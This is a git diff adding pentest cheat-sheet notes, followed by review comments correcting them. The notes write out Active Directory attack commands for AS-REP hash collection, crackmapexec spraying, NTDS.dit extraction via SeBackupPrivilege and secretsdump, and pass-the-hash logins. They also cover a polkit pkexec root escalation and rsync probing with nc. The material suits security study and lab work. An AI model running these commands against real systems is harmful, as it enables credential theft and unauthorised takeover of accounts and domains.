diff --git a/.gitmodules b/.gitmodules index 6abf8eb..8f50a98 100644 --- a/.gitmodules +++ b/.gitmodules @@ -100,3 +100,6 @@ [submodule "reverse_engineering/java/deobfuscator"] path = reverse_engineering/java/deobfuscator url = https://github.com/java-deobfuscator/deobfuscator.git +[submodule "exploit/windows/CrackMapExec"] + path = exploit/windows/CrackMapExec + url = https://github.com/byt3bl33d3r/CrackMapExec.git diff --git a/enumeration/docs/kerberoast.md b/enumeration/docs/kerberoast.md new file mode 100644 index 0000000..bef379b --- /dev/null +++ b/enumeration/docs/kerberoast.md @@ -0,0 +1,20 @@ +# Kerberoast + +## Usage + +* Impacket's `GetNPUsers.py` to get Hashes of userlist +```sh +GetNPUsers.py -no-pass / -usersfile users.txt -format john -outputfile hashes +``` + +* Use crackmapexec to gain access to further user accounts with the password of the user found with `GetNPUsers.py` +```sh +crackmapexec smb $TARGET_IP -u users.txt -p pass.txt +``` + * Watch out for `STATUS_PASSWORD_MUST_CHANGE` + * Change password with +```sh +smbpasswd.py @$TARGET_IP -newpass password123 +``` + + diff --git a/enumeration/docs/rsync.md b/enumeration/docs/rsync.md index a3d72fa..f7fd55a 100644 --- a/enumeration/docs/rsync.md +++ b/enumeration/docs/rsync.md @@ -1,6 +1,7 @@ # rsync -[netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/) +* [netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/) +* [hacktricks' rsync](https://book.hacktricks.xyz/pentesting/873-pentesting-rsync) ## Enumerate @@ -9,6 +10,19 @@ rsync :: rsync ::files rsync ::files/foo/ ``` +### via netcat +* Another way is the following +```sh +nc -vn $TARGET_IP 873 +``` +* Repeat the identical handshake, e.g. +``` +@RSYNCD: 31.0 +``` +* List all directories +```sh +#list +``` ## Downloads 
diff --git a/exploit/linux/polkit.md b/exploit/linux/polkit.md index 7dcdba8..eca25ba 100644 --- a/exploit/linux/polkit.md +++ b/exploit/linux/polkit.md @@ -22,3 +22,19 @@ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-re * `su user1` and `sudo -s` +# Priv Esc with Two Sessions +* User has to be member of group `sudo` +* Open two ssh sessions +* In session one check the PID +```sh +echo $$ +``` +* In the other session +```sh +pkttyagent --process +``` +* In session one do +```sh +pkexec "/bin/bash" +``` +* Enter password in session two diff --git a/exploit/web/ssti/tplmap b/exploit/web/ssti/tplmap index 1d63156..6f21501 160000 --- a/exploit/web/ssti/tplmap +++ b/exploit/web/ssti/tplmap @@ -1 +1 @@ -Subproject commit 1d6315650b2177d25e5f8513b35dd80006996d98 +Subproject commit 6f2150134dc637ff80478f623f28bb548ea2ca15 diff --git a/exploit/windows/CrackMapExec b/exploit/windows/CrackMapExec new file mode 160000 index 0000000..a8df4c2 --- /dev/null +++ b/exploit/windows/CrackMapExec @@ -0,0 +1 @@ +Subproject commit a8df4c2a868378576f3b959261ad756e06ed3749 diff --git a/exploit/windows/docs/impacket.md b/exploit/windows/docs/impacket.md index c51d8d2..b8c7297 100644 --- a/exploit/windows/docs/impacket.md +++ b/exploit/windows/docs/impacket.md @@ -2,3 +2,13 @@ * [Repo](https://github.com/SecureAuthCorp/impacket) +## Secretsdump +* `ntds.dit` and `system.hive` are needed +```sh +secretsdump.py -system system.hive -ntds ntds.dit -hashes lmhash:nthash LOCAL -outputfile hashes.txt +```` +* Remove everything but the hashes +* Use it to log in on the target +```sh +crackmapexec smb $TARGET_IP -u -H hashes.txt +``` diff --git a/exploit/windows/impacket b/exploit/windows/impacket index 6da655c..10e5395 160000 --- a/exploit/windows/impacket +++ b/exploit/windows/impacket @@ -1 +1 @@ -Subproject commit 6da655ca9ac4f9c2a207ea47e79d089044accd78 +Subproject commit 10e53952e64e290712d49e263420b70b681bbc73 
diff --git a/hydra.md b/hashes/password_cracking/hydra.md similarity index 100% rename from hydra.md rename to hashes/password_cracking/hydra.md diff --git a/post_exploitation/docs/windows/pass_the_hash.md b/post_exploitation/docs/windows/pass_the_hash.md new file mode 100644 index 0000000..682d941 --- /dev/null +++ b/post_exploitation/docs/windows/pass_the_hash.md @@ -0,0 +1,12 @@ +# Pass the Hash + +## Usage + +```sh +GetUserSPNs.py / -hashes -outputfile hash.txt +``` +* Crack the password +* login +```sh +evilwinrm -i $TARGET_IP -u -p password +``` diff --git a/post_exploitation/docs/windows/sebackupprivilege.md b/post_exploitation/docs/windows/sebackupprivilege.md new file mode 100644 index 0000000..b8f6537 --- /dev/null +++ b/post_exploitation/docs/windows/sebackupprivilege.md @@ -0,0 +1,29 @@ +# SEBackupPrivilege Escalation + +* Check user privileges to escalate + +## Usage +* Check `whoami /all` +* `SeBackupPrivilege` must be present +* [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary) +* Upload `diskshadow.txt` to the target with the following content +```sh +set metadata C:\tmp\tmp.cabs +set context persistent nowriters +add volume c: alias someAlias +create +expose %someAlias% h: +``` +* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\Path\to\diskshadow.txt` +* Upload these [dlls](https://github.com/giuliano108/SeBackupPrivilege) to the target +```sh +import-module .\SeBackupPrivilegeUtils.dll +import-module .\SeBackupPrivilegeCmdLets.dll +copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite +reg save HKLM\SYSTEM C:\Path\to\uploads\system +``` +* Downloads the files `ntds.dit` and `system` +* Extract the hashes via +```sh +secretsdump.py -system system -ntds ntds.dit LOCAL > out.txt +``` 
diff --git a/post_exploitation/priv_esc/privesc-scripts/privilege-escalation-awesome-scripts-suite b/post_exploitation/priv_esc/privesc-scripts/privilege-escalation-awesome-scripts-suite index a17f917..8c67152 160000 --- a/post_exploitation/priv_esc/privesc-scripts/privilege-escalation-awesome-scripts-suite +++ b/post_exploitation/priv_esc/privesc-scripts/privilege-escalation-awesome-scripts-suite @@ -1 +1 @@ -Subproject commit a17f91745cafc5fa43a428d766294190c0ff70a1 +Subproject commit 8c67152e1761fb9b403918a7fa174126f36f61db diff --git a/xor_key_file.py b/stego/xor_key_file.py similarity index 100% rename from xor_key_file.py rename to stego/xor_key_file.py
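Review bot: in the `.gitmodules` hunk, the new CrackMapExec submodule lives under `exploit/windows/CrackMapExec` and the later hunk pins it at commit a8df4c2, yet every document in this patch that invokes it (`enumeration/docs/kerberoast.md`, `exploit/windows/docs/impacket.md`) calls a bare `crackmapexec` and never says that the vendored checkout is the intended copy; add a one-line pointer to the submodule path in those docs (or the top-level README) so the version the notes were written against and the version pinned in the repo stay in sync.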
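Review bot: in `enumeration/docs/kerberoast.md`, the title does not match the content: `GetNPUsers.py` collects AS-REP hashes for accounts without Kerberos pre-authentication (AS-REP roasting), while Kerberoasting is the `GetUserSPNs.py` workflow that this patch places in `post_exploitation/docs/windows/pass_the_hash.md`; retitle or move the sections so each heading describes its commands. The domain placeholder in `GetNPUsers.py -no-pass / -usersfile users.txt` and the user placeholder in `smbpasswd.py @$TARGET_IP -newpass password123` have been dropped (most likely angle-bracket placeholders swallowed by the Markdown renderer), so write them as `$DOMAIN` and `$USER` in the style of the existing `$TARGET_IP`. The two indented bullets after the crackmapexec block (`Watch out for STATUS_PASSWORD_MUST_CHANGE`, `Change password with`) follow a closed code fence and will not render as a nested list; also state plainly that the `smbpasswd.py` step changes the account's password on the target, which the reader will want recorded for clean-up.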
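Review bot: in the `### via netcat` hunk of `enumeration/docs/rsync.md`, the bullet `List all directories` is inaccurate: `#list` asks the rsync daemon for the modules it exports, not directories, and it is typed into the open `nc` session rather than into a shell, so the fence should not be tagged `sh` (in a shell `#list` is a comment). The `@RSYNCD: 31.0` line is the version banner the client echoes back; say explicitly that the reader repeats whatever banner the server sent rather than the fixed `31.0`, which the current wording (`Repeat the identical handshake, e.g.`) only hints at.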
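Review bot: in the `# Priv Esc with Two Sessions` hunk of `exploit/linux/polkit.md`, `pkttyagent --process` is missing its value: the PID printed by `echo $$` in session one must be the argument of `--process`, and as written the option has nothing to register for, so the `pkexec "/bin/bash"` prompt will not show up in session two. The bullet `User has to be member of group sudo` should also say where that requirement comes from: it is polkit's admin-identity configuration (commonly `unix-group:sudo` on Debian/Ubuntu-style setups), not `sudo` itself, so on a distribution that maps admin identity to `wheel` or another group the prerequisite differs; and because a `sudo` member can already run `sudo -s` (mentioned in the context line just above), state in what situation this two-session path is the one to reach for.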
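Review bot: in `exploit/windows/docs/impacket.md`, the closing fence after the `secretsdump.py` line is four backticks (` ```` `), which does not close the three-backtick fence and turns the rest of the file into a code block; make it three. The `crackmapexec smb $TARGET_IP -u -H hashes.txt` line lacks the value for `-u` (a user name or the user list), and `Remove everything but the hashes` should name which field is kept: secretsdump writes `user:rid:lmhash:nthash:::` lines, so say whether the file passed to `-H` holds only the NT-hash column and how its lines are meant to pair up with the `-u` entries.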
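Review bot: `post_exploitation/docs/windows/pass_the_hash.md` never passes a hash at the login step: the last command authenticates with `-p password` after a cracking step, so the page is really Kerberoasting with a hash-authenticated `GetUserSPNs.py`, while the `Kerberoast` title sits on the AS-REP roasting notes in the `enumeration/docs/kerberoast.md` hunk; retitle this file or move the `GetUserSPNs.py` line there. The tool is spelled `evil-winrm` (the executable carries a hyphen), and both `GetUserSPNs.py / -hashes -outputfile hash.txt` and `evilwinrm -i $TARGET_IP -u -p password` are missing their placeholders (the domain before `/`, the value after `-hashes`, the user after `-u`), so write them as `$DOMAIN`, `$HASH` and `$USER` consistent with `$TARGET_IP`.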
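Review bot: in `post_exploitation/docs/windows/sebackupprivilege.md`, `set metadata C:\tmp\tmp.cabs` most likely means `tmp.cab`, and no step creates `C:\tmp`, which has to exist before `diskshadow.exe /s` writes the metadata file and before `copy-filesebackupprivilege ... C:\tmp\ntds.dit` runs; add a `mkdir C:\tmp` step or note the prerequisite. Both code blocks are tagged `sh` although the first is a diskshadow script and the second is PowerShell (`import-module`, `copy-filesebackupprivilege`), so tag them accordingly, and `reg save HKLM\SYSTEM C:\Path\to\uploads\system` writes to a different directory from the `C:\tmp` used one line above, so pick one location. `Downloads the files` should read `Download the files`, and the stray `Check user privileges to escalate` bullet before `## Usage` duplicates the `Check whoami /all` bullet below it.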